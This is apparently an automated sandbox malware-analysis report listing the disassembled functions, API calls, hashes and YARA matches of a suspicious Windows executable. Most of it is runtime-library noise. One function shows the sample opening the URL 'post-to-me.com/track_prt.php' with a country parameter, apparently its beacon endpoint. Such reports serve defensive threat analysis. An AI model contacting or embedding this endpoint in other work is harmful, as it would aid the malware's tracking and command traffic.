                                                                                                                                                                                                                                                  • Instruction ID: d17c98884c81a07c221e01167a91e6b062ac5563427542c17ab72a81fb39783a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF01F4365C67007FD31737246C84E2B266FFBC6B72B610128FD25D2290EF758D058569
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431F01
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431F29
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                  • Instruction ID: 142cfc1d6fefe371a65853cee7fca9c099a37b51f1b4623e9e727693a4b19c8f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 49F02D3A508A0037D61637266C06B1B2A19AFD9B27F31112FF814D33F2EF2DC802452D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0212A9DC,?,00000000,?,0212CDD6,02102474,00000000,?,00451F20), ref: 02132135
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132168
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132190
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 0213219D
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021321A9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3170660625-0
                                                                                                                                                                                                                                                  • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                  • Instruction ID: 9e0927ecfe180356faf3b65b0ac30c55be2bef43588e1fb1e0c1b74b04958092
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04F081365C56007FD6173728BD09B1A266B9FC2B62B250124FE1892290EBB18916856A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041272D: TlsGetValue.KERNEL32(?,?,00410B4B,00412C58,00000000,?,00410B29,?,?,?,00000000,?,00000000), ref: 00412733
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041793A
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FCA
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FE3
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421059
                                                                                                                                                                                                                                                    • Part of subcall function 00420FA3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421061
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417948
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417952
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041795C
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041797A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4266703842-0
                                                                                                                                                                                                                                                  • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction ID: 571f4fa900913ae9ac1b624b88cebae7c96a5b4968f9dadd54c27da6e91ea8e9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7F0F671A0421467CA15B737A8529EEB7669F90764B40012FF41193292DFAC9E9886CD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 02112994: TlsGetValue.KERNEL32(?,?,02110DB2,02112EBF,00000000,?,02110D90,?,?,?,00000000,?,00000000), ref: 0211299A
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02117BA1
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02121231
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0212124A
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 021212C0
                                                                                                                                                                                                                                                    • Part of subcall function 0212120A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 021212C8
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02117BAF
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02117BB9
                                                                                                                                                                                                                                                  • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02117BC3
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02117BE1
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4266703842-0
                                                                                                                                                                                                                                                  • Opcode ID: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction ID: b39b8f2f08f0850a02be051cee40434f5590c5c0e43812909862b81a9795f570
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddd470ca706d5bdb1fd34f34a64e878e0bf6dea1610dba1cf15e232951c7dc30
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9F02B3164062C6FCF25F775D81096DF727DF80B14B00413AE81153290EF359A568FC5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E4D
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E5F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E71
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E83
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439E95
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction ID: d2eb3a6f69ed6479eb379d103aeec45d7d0be428363b37fe18b93f123c88dda9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F04F32905300A7A621EF59E487C1773D9BB08712F68694BF00CD7751CB79FC808A5D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0B4
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0C6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0D8
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0EA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213A0FC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction ID: 177feedc7a034c6d63ca9214b7eff9e00ec82f77797cacc42cb7287c95b92321
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 08F03672985300AF8B26EB54F9C6C1A7BDBAE047157640955F098D7721CB31FC908ADD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431738
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043174A
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043175D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043176E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043177F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction ID: 641b2a1348aedb00c037ff60dfb94c9ddf1ba1fe668fd8dfad71f65212485368
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F03070C003109BAA236F15AC414053B60BF2D727B15626BF40697273CB38D952DF8E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCBF
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CCF0
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0041CCF9
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD0C
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD15
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2583373041-0
                                                                                                                                                                                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction ID: c05db364d3e23aa36edd3e4f9db1c19a47e3778ae9c6089a54b2af47d917b565
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0EF0A776240500AB8625FF22F9518F77776EFC4715310091EE44B07651DF29ADC2DB6A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213199F
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319B1
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319C4
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319D5
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021319E6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction ID: c84d76a7ec8478e47b2b19a290cd224da4698f5ebcffc012ab84ac2ae4a3f894
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 39F0D0B1C50310AF9F226F14BC804047B62AF1972271112A6F41697372C735D966DFDE
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0211CF26
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0211CF57
                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 0211CF60
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0211CF73
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0211CF7C
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2583373041-0
                                                                                                                                                                                                                                                  • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction ID: 49492f052e6bcf0d34cd10f35e7c44bf7b2d4ae7aeb08980cb3f77691da3350b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7F0A036280A019FCA29EF60F9508BB73B6AFC4610300097DE49706564DF31A907DF62
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02102E84
                                                                                                                                                                                                                                                    • Part of subcall function 02101321: _wcslen.LIBCMT ref: 02101328
                                                                                                                                                                                                                                                    • Part of subcall function 02101321: _wcslen.LIBCMT ref: 02101344
                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02103097
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                  • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                  • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                  • Opcode ID: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                                                  • Instruction ID: 1d88bd029be202185399ef50839c551340a29599fc01340129a579fe23b7dea2
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8338334aa55b55d19b97b2d3d130d29e6172645a3c0eef54179fbcd96b31667d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 215153A5A65344A9E320EFB0BC55B3533B8FF54712F10543AE528CB2B2E7B19944871E
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434464
                                                                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00434479
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                  • String ID: BC$BC
                                                                                                                                                                                                                                                  • API String ID: 885266447-2490606219
                                                                                                                                                                                                                                                  • Opcode ID: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                                                  • Instruction ID: b88449fc46bca28f45784ded13f8a3cce66366d25dc88dae471b8c9c35daa9d8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e00c22cf9212fddccde6eda0d4f11a2eb8b15fda35716567c4cef15c7bcc9cff
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61518F71A00208AFCB14DF59C884AAEBBB2EFD8314F19C26AE81897361D775ED51CB44
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\L7GNkeVm5e.exe,00000104), ref: 0042F743
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042F80E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0042F818
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-4220347748
                                                                                                                                                                                                                                                  • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                  • Instruction ID: 9cabfb70e7d1101f7aa6931033736f2f7250cd8eb994997f94c6a7917a9720ec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7631B371B00228AFDB21DF9AAC8089FBBFCEF95314B90407BE80597211D7749E45CB99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\L7GNkeVm5e.exe,00000104), ref: 0212F9AA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0212FA75
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0212FA7F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                  • String ID: C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                  • API String ID: 2506810119-4220347748
                                                                                                                                                                                                                                                  • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                  • Instruction ID: 8facf950d44fbf943ec3dc07002f5198707b9aa946ccfade6258a39ecf0727b1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9F319F71E80228EFDF21DF999C80D9EBBBDEF89710F104066F80497221D7709A5ACB90
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0210C8D4
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Exception@8Throw
                                                                                                                                                                                                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                  • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                  • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction ID: fbc13c51cffb980a43923277d1fdbd5d141332cf6266289b99c348f7a046b78e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47F02B73D806186FCB14E954CC81BEA33985B01305F048177EE516A0C2E7E89905CFEC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,00431F4D), ref: 0042DF89
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(00457910,00000010,00000003,00431F4D), ref: 0042DFC3
                                                                                                                                                                                                                                                  • ExitThread.KERNEL32 ref: 0042DFCA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
